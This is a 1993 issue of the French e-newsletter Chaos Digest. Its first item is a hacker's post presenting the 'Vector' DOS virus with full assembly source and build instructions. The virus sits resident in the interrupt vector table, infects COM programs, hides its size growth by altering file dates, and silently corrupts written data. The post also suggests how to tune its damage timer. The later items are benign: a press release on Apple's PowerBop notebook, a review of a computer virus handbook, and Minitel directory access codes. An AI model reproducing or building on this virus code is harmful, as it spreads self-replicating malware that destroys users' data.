Chaos Digest Lundi 7 Juin 1993 Volume 1 : Numero 45

Chaos Digest Lundi 7 Juin 1993 Volume 1 : Numero 45
ISSN 1244-4901

Editeur: Jean-Bernard Condat ([email protected])
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere

TABLE DES MATIERES, #1.45 (7 Juin 1993)
File 1--Le virus Vector (essai d'ecriture)
File 2--PowerBop, le portable Apple communicant sans fils (technique)
File 3--Critique de _Computer Virus Handbook_ de Highland (livre)
File 4--L'annuaire electronique [11] en langues etrangeres (acces)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
[email protected]
with a mail header or first line containing the following informations:
X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893. Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:

* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Wed, 2 Jun 1993 14:03:46 +0100 (WET DST)
From: [email protected] (Necros the Hacker )
Subject: File 1--Le virus Vector (essai d'ecriture)

The Vector Virus
by
Necros the Hacker

This is a fairly simple virus I wrote a while back. However, for its size
it has some nice features, including

* memory resident in the interrupt vector table;
* hides file size increases;
* infects COM programs on opening or execution;
* small and subtle, but nasty, damage routine.

The main aim of the virus was to write something small and well-coded. At
376 bytes it's not tiny but it's small enough to fit into the interrupt
vector table. The side effects of placing the virus in the interrupt table
are that it may conflict with other programs which use the interrupts, but
more importantly it can go resident without users noticing a decrease in
system memory.

Ok, so that's the idea behind it. Now what does it do? Well, it's resident
in memory and infects COM programs when they're opened or executed. Notice
that's COM *programs*, not just files. It checks to see if the file is
actually a COM program with an EXE extension too. The virus has a timer
which counts up to 0FFFh & when this number of writes takes place in DOS
with the virus resident, it performs its damage. The damage is simply to
chnage the data that was written subtly --- a byte is dropped from the
start of the written block & appened to the end. So there's no change in
size of the file that was written. For EXE programs or archive programs or
backup programs this sort of error can ruin the whole file. At least it
makes the job of recovering the undamaged data from the damaged stuff very
difficult.

The virus also hides file size increases. Each infected file has its date
increased by a century, so it won't appear as being different in listings.
Only FCB calls are intercepted & massaged into subtracting the virus'
length. I couldn't be bothered to do it for handle calls cos FCBs are used
in the DOS dir command.

Anyway, I present this code more as a demonstration of how to do some
common things efficiently. I'm mainly interested in writing good code, so
if anyone's got any suggestions on how to make it better, you can comment
here if the list maintainer is in agreement.

Oh, one last thing. The assembler code is turned into a COM program using
tasm & tlink. The resultant program is actually an infector of a program
called test.com. Just create a simple 3-byte program & then run
vector.com which will infect the test program. There's a message at the
end of the virus which can be removed if you want. Don't just overwrite it
with your own. Removing it is a matter of moving the line just after
message db . . . to just before it. Another thing you might want to modify
is the damage timer . . . change 0fffh in the code to some other value.
I'll leave you figure out what to change it to yourself. It shouldn't be
too dificult :)

Have fun,
NTH

---------------------------------------------------------------------------
;VECTOR.ASM Written by Necros the Hacker 12 Aug 1991
;TSR virus which resides in interrupt table

model tiny
code
org 100h ;makes no difference - relocatable
start:
jmp shell ;the non-resident part of the virus
;the three previous bytes are overwritten with host's first bytes
org 103h
repair:
mov si,[ds:101h] ;find offset of virus from 100h
mov di,100h ;place to write original file bytes
push di
add si,di ;si is now start of virus

cld
movsb
movsw ;restore start of host

push es
xor bx,bx ;suitably unused register
mov es,bx
mov cx,[es:0084h] ;offset of int 21 handler
mov dx,[es:0086h] ;segment of int 21 handler
push ax
mov ax,4bf1h
int 21h
mov di,ax
pop ax
cmp di,0abc0h ;signature
jz restart_host ;already installed

sub si,3 ;point to start of virus again

;code to make resident and hook vectors
;first save the old vector (in this copy)
mov (old_int_21-100h)[si],cx
mov (old_int_21-0feh)[si],dx

;now make the copy!
mov di,07bh*4
mov cx,virus_length
rep movsb

;now hook the vector proper
cli
mov [es:0084h],offset handler_offset
mov [es:0086h],cx
sti

;and fall through to restart the host

restart_host:
pop es
ret ;start host (note AX unchanged by virus)

jump_buf_offset equ $-100h+07bh*4
jump_buf db 0e9h,0,0 ;jump to replace start of host

modify_dir proc near
pushf
call dword ptr cs:chain_offset
cmp al,0ffh
je ret_error
push es
push bx
push ax
mov ah,2fh
int 21h
cmp byte ptr es:[bx],0ffh ;is extended FCB?
jne not_extended
add bx,7
not_extended:
cmp byte ptr es:[bx+1ah],51 ;year>2105 AD?
jbe no_mods
sub word ptr es:[bx+1dh],virus_length
no_mods:
pop ax
pop bx
pop es
ret_error:
iret

modify_dir endp

;new int 21 handler
even ;although the virus is relocatable, it will
;always be on an even address when resident

chain_offset equ $-100h+07bh*4 ;alsolute address to chain to
old_int_21 dw 0,0

handler_offset equ $-100h+07bh*4
new_handler proc
cmp ax,4bf1h ;residency request
jne is_dir
mov ax,0abc0h
iret

is_dir:
cmp ah,11h
je modify_dir
cmp ah,12h
je modify_dir

cmp ah,40h ;write?
jne is_open
cmp bl,3 ;don't affect stdout/stderr/stdin
jb damage_ok
inc dx ;perform damage
dec word ptr cs:[offset counter_offset]
jz damage_ok
dec dx ;not time for damage, so undo it
damage_ok:
and word ptr cs:[offset counter_offset],0fffh
jmp normal_handler

is_open:
cmp ah,3dh ;open file (read only)
jne is_exec

;infect only COM (or EXE) files when opened
push ax
push si
mov si,dx
cld
find_extension:
lodsb
or al,al
je no_infect
cmp al,'.' ;look for the extension
jne find_extension

;OK now check to see if the extension is COM or EXE
lodsb
or al,20h
cmp al,'c'
jne try_exe
lodsw
or ax,2020h
cmp ax,'mo'
jne no_infect
je eligible
try_exe:
lodsw
or ax,2020h
cmp ax,'ex'
jne no_infect
eligible:
pop si
pop ax
jmp infect_file

no_infect:
pop si
pop ax
jmp normal_handler

is_exec:
cmp ax,4b00h ;EXEC?
jne normal_handler

infect_file:
;code to infect the file
push ax
push bx
push cx
push dx
push ds

;open the file for infecting
mov ax,3d02h
xor cx,cx
pushf

call dword ptr cs:chain_offset
jc restore_regs
mov bx,ax

push cs
pop ds

mov ah,3fh ;read from handle
mov cx,3 ;first three bytes
mov dx,07bh*4h ;to start of virus (jumped over)
int 21h
jc no_date_set ;only small files

cmp ds:[07bh*4],'ZM' ;EXE file?
je no_date_set

mov ax,5700h ;get time and date stamp
int 21h
push cx
push dx
cmp dh,51 ;year>=2005 (1980+25+1 from month)
ja close_file

pop dx
add dh,200 ;gives same year in next century
push dx ;will be set before closing

mov ax,4202h ;LSEEK to end of file
xor cx,cx
xor dx,dx
int 21h

mov word ptr offset jump_buf_offset+1,ax ;save length of host

;while we're here, append the virus
mov ah,40h
mov cx,virus_length
mov dx,07bh*4
int 21h
jc close_file

mov ax,4200h ;LSEEK to start of file
xor cx,cx
xor dx,dx
int 21h

mov ah,40h ;write with handle
mov cx,3
mov dx,offset jump_buf_offset
int 21h

close_file:
pop dx
pop cx
mov ax,5701h ;reset time and date
int 21h
no_date_set:
mov ah,3eh
int 21h
restore_regs:
pop ds
pop dx
pop cx
pop bx
pop ax

normal_handler: ;either open or EXEC
jmp dword ptr cs:chain_offset
new_handler endp

counter_offset equ $-100h+07bh*4
counter dw 0 ;when counter reaches zero, byte is "lost"

message db 'V3.0 [VECTOR] (c) Necros the Hacker',10,13
db 'Written Aug 1991 in Tralee, Ireland',10,13

virus_length equ $-start

shell:
;open the file for infecting
mov ax,3d02h
xor cx,cx
mov dx,offset filename
int 21h
jc shell_error
mov bx,ax

mov ah,3fh ;read from handle
mov cx,3 ;first three bytes
mov dx,0100h ;to start of virus (jumped over)
int 21h
jc shell_error

mov ax,4202h ;LSEEK to end of file
xor cx,cx
xor dx,dx
int 21h

mov word ptr jump_buf+1,ax ;save length of host

;while we're here, append the virus
mov ah,40h
mov cx,virus_length
mov dx,0100h
int 21h
jc shell_error

mov ax,4200h ;LSEEK to start of file
xor cx,cx
xor dx,dx
int 21h

mov ah,40h ;write with handle
mov cx,3
mov dx,offset jump_buf
int 21h

mov ah,3eh
int 21h

exit_stub:
mov ax,4c00h
int 21h
shell_error:
mov ah,9
mov dx,offset err$
int 21h
jmp exit_stub
err$ db 'Error infecting file',10,13,'$'
filename db 'test.com',0
end start

------------------------------

Date: Fri Jun 4 12:07:00 -0600 1993
From: [email protected] (cccf )
Subject: File 2--PowerBop, le portable Apple communicant sans fils (technique)

Apple European R&D extends mobile computing
with wireless communications

Paris La Defense, June 4, 1993--With PowerBop, the first notebook
integrating cordless communications technology, recently launched in
France, Apple European R&D extands mobile computing and enhances
communications capabilities. PowerBop, the newest model of the popular
PowerBook series, offers the highest degree of autonomy on the notebook
computer market today.

The ongoing technical cooperation between Apple European R&D Centre based
in Paris, and France Telecom, the French PTO operator resulted in the
integration of radio capabilities with notebook computers making it
possible to connect them to Telepoint services. Telepoint is expanding
more and more in Europe and uses the most affordable wireless technology
available today.

Apple European R&D focuses primarily on modems, on telecommunications in
mobile computers and on products that comply with OSI (Open System Inter-
connection) standards.

PowerBop: A new dimension in communications freedom
+---------------------------------------------------

PowerBop brings notebook users an added dimension of freedom, above and
beyond the inherent benefits of Apple's popular PowerBook models. The
PowerBop contains a radio modem conform to the CT2 Telepoint standard in
accordance with the Common Air Interface (CAI), adopted in June 1991 on an
European level. The CT2 standard allows a new generation of personal
telephones. Their owners are able to use them in public places in large
cities, at home as a traditional cordless phone and in the office via PBX
extensions.

Within the PowerBop, the radio modem CT2 provides the ability to connect
it to a full range of communications services, at any time, from any place
that is located between 20 and 500 meters from the base station of the
Pointel network "Bi-Bop", launched by France Telecom in Paris and
Strasbourg on April 22,1993. These services include: access to the France
Telecom videotex service "Minitel", message and file exchange, fax
transmission, access to servers and databases.

Thanks to the low energy consumption of the CT2 technology, the PowerBop
retains its 1 - 1/2 to 2 hours of endurance when the wireless modem is
being used.

The PowerBop features all the advantages of the PowerBook 180, Apple's
high-end notebook. The internal floppy disk drive is replaced by the CT2
modem which means that users do not need to carry any additional equipment
to communicate via the telepoint network. An external floppy disk drive is
supplied as a standard accessory.

Like the Bi-Bop pocket phone designed and developped by France Telecom, the
Apple PowerBop has a small antenna which folds into a special slot.

The Express Modem provided as standard equipment inside the PowerBop,
offers a full range of communications functions:

* access to one of the 15,000 Minitel services;
* fax transmision (reception will be available on the French
network from Septembre 1993);
* data transmission from 300 to 14,400 bps.

The Express Modem can either be connected directly to a telephone line or
use the Bi-Bop network for wireless communications up to 9,600 bps.

Digital Cordless Market
+-----------------------

European operators view telepoint as a mass market application for wireless
telephones. At the present time, no European country offers a nationwide
commercial telepoint service. However there are currently a number of
networks of this type spreading out. Mainly, in the UK, Netherlands,
Finland and Belgium.

In other parts of the world, others such developments are under way, in
Asia, Australia, Canada and the United-States.

On the sales side, it appears that all the operators have a common desire
to implement a pricing structure to allow this technology to be affordable
for a consumer market.

France Telecom's new Bi-Bop service
+-----------------------------------

France Telecom took a leading role in the development of European telepoint
services. On April 22, France Telecom launched the Bi-Bop cordless digital
pocket phone in Paris. The system which employs the CT2 cordless standard,
sets up a digital radio link between the Bi-Bop terminal and a public or
home base station.

The Bi-Bop service covers three main types of use:

* Public use: Bi-Bop subsribers can call anywhere in the world from
major cities, starting with Paris and Strasbourg. The network is
designed to cover major thoroughfares and public places. Today, some
3,000 base stations (4,000 by fall 1993) span Paris and the greater
Paris area (Ile-de-France) and the network will be progressively
extended to other areas. Starting in September 1993, subscribers will
also be able to receive calls, and PowerBop notebook users will have
fax reception capacities;

* With a private home base station connected to a standard telephone
outlet, the PowerBop is transformed into a high-performance mobile
computing tool allowing one to access all private communications
services;

* Wireless PBXs are available to companies, allowing PowerBop users
anywhere at a site, for example, to benefit from the same computing
environment as if the user was at his desk. The PowerBop can also
become a mobile fax terminal.

Availability
+------------

The PowerBop will be available through certified Apple Computer France
distributors in June 1993. PowerBop owners must have a special telephone
subscription with France Telecom.

Nota Bene
+---------

At this time, I am in a luxurous cafe on the Champs-Elysees in Paris in
holidays and I send this note to ChaosD with my PowerBop... without any
problem...

------------------------------

Date: Fri Jun 4 12:07:00 -0600 1993
From: [email protected] ("Rob Slade, DECrypt Editor, VARUG NLC rep )
Subject: File 3--Critique de _Computer Virus Handbook_ de Highland (livre)
Copyright: Robert M. Slade, 1993

Elsevier
Mayfield House
256 Banbury Road
Oxford OX2 7DH
England
655 Avenue of the Americas
New York, NY 10010
USA
212-989-5800
fax: 212-633-3990

Computer Virus Handbook, Harold Joseph Highland
1990, 0-946395-46-2

When Dr. Highland first offered to send me a copy of this work, late in 1992,
he indicated that it was outdated. In some respects this is true. Some of
the precautions suggested in a few of the essays which Dr. Highland did not
write tend to sound quaint. As one example, with the advantage of hindsight,
Jon David's ten page antiviral review checklist contains items of little use,
and has a number of important gaps. However, for the "general", rather than
"specialist" audience, this work has much to recommend it. The coverage is
both broad and practical, and the information, although not quite up to date,
is complete and accurate as far as it goes.

The book starts with, as the title has it, "Basic Definitions and Other
Fundamentals". Dr. Highland has collected definitions from a number of
sources here, which makes a refreshing change from some of the dogmatic
assertions in other works. The fact that the reader is left to make his own
final decision as to a working definition might be frustrating to some, but
is likely reasonable given that the argument over the definition of a virus
is still raging to this day. With the changes that are still taking place
in terms of new "forms" of viral programs, it is unlikely that this debate
will be settled any time soon.

Chapter one also contains important background information on the operation of
the PC and the structure of MS-DOS format disks. The one shortcoming might be
that so much of the book deals with MS-DOS machines that readers dealing with
other systems may fail to note the generic concepts contained therein.

Chapter two is a concise but encompassing overview of the viral situation by
William Hugh Murray. Using epidemiology as a model, he covers the broad
outline of viral functions within a computing "environment", and examines some
theoretical guidelines to direct the building of policy and procedures for
prevention of viral infection. The article is broadly helpful without ever
pushing the relation between computer viral and human epidemiology too far.

Chapter three deals with history and examples of specific viral programs. This
section is an extremely valuable resource. While other works reviewed have
contained similar sections, the quality of this segment in Highland's tome is
impressive. Mention must be made of the reports by Bill Kenny of Digital
Dispatch who provides detailed and accurate descriptions of the operations of
a number of viral programs which are, unfortunately, all still too common.
(Chapter four is similar, containing three reports of viral programs from
other sources.)

Large sections of the handbook deal with the evaluation and review of
antiviral software. (I must say that I had great sympathy with that part of
the preface which dealt with some experiences encountered when trying to
test various packages.) Chapter five gives an evaluation protocol and test
methodology. The detail here may lead some to skip over it, but it is
helpful to those who wish to determine how thoroughly the testing was
conducted. Chapter six, an article by Jon David as mentioned earlier, is
a suggested procedure and checklist for testing antiviral software. This
chapter is unfortunately weak, and although there is some valuable direction,
one comes away with the impression that the important thing to test is
whether the program runs on a VGA monitor and has a bound manual. One must,
of course, realize that antiviral testing was then in its infancy, and Mr.
David's article reflects the general tone fo those times. Chapter seven is
concerned with specific product evaluations, and, as most lists of its type
do, shows its age. Of the twenty products listed, I recognize only seven
as still being in existence,; of those that still do exist four have changed
substantially in the intervening three years.

Chapter eight is an essay by Harry de Maio entitled "Viruses - A Management
Issue", and it must be considered one of the "forgotten gems" of virus
literature. It debunks a number of myths, and raises a number of issues
seldom discussed in corporate security and virus management. Chapter nine
is similar, being Dr. Highland's suggested procedures for reducing the risk
of computer virus infection.

Chapter ten is a collection of essays on theoretical aspects of computer virus
research and defence. Fred Cohen is heavily represented here, of course, but
not as singularly as in, for example, Hoffman's "Rogue Programs".

Dated as the book may be in some respects, it is still a valuable overview
for those wishing to study viral programs or the defence against them,
particularly in a corporate environment. While some may find the book to
be "academic" in tone, it never launches into "blue sky" speculations: all
of the material here is realistic. The "aging" of the product reviews makes
it difficult to consider it still a reference "handbook" or a "how to"
resource, but Dr. Highland's work is by no means to be discarded yet.

+++++++++++++++
Vancouver [email protected] | "Do you get guns with your
Institute for [email protected] | gun magazines? No.
Research into [email protected] | Do you get viruses with your
User [email protected] | virus magazines? Yes."
Security Canada V7K 2G6 | - Kevin Marcus

------------------------------

Date: 03 Jun 93 23:59:59 GMT
From: [email protected] (Jean-Bernard Condat )
Subject: File 4--L'annuaire electronique [11] en langues etrangeres (acces)
Repost from: [email protected]

Since the beginning of February, the French "Annuaire Electronique" is
available in Italian language. You can access it, from France, by
dialing 3614 code RAE, and from other countries, by MinitelNet or by a
telephone line: +33 36 43 14 14 code RAE (Ricerca Annuario
Elettronico).

+----------------------------------------+
| *R*icerca |
| *A*nnuario |
| *E*lettronico |
| |
| 1 Ricerca di un abbonato |
| |
| 2 LA POSTA : codice di |
| avviamento postale |
| |
| 3 Sapere tutto sull'elenco |
| elettronico |
| |
| 4 Sapere tutto sul minitel |
| |
| 5 L'elenco elettronico |
| e teletel dall'estero |
| |
|----------------------------------------|
| N! scelto: ... poi Invio |
| (C) France Telecom 1992 |
+----------------------------------------+

For all versions, all diagnostics, instructions and list of
professionnals are translate into the appropriate language. Five
different options are available: "Search for a subscriber", "The Post
Office: Postal Code", "All you need to know about the Electronic
Directory", "All you need to know about the Minitel", "Electronic
Directory and Teletel from abroad".

Called the "11" in France, this service is already available in:

* English: 3614 code ED [Electronic Directory];
* Spanish: 3614 code GTE [Guidia Telefonica Electronia];
* German : 3614 code ETB [Elektronisches Telefonbuch].

------------------------------

End of Chaos Digest #1.45
************************************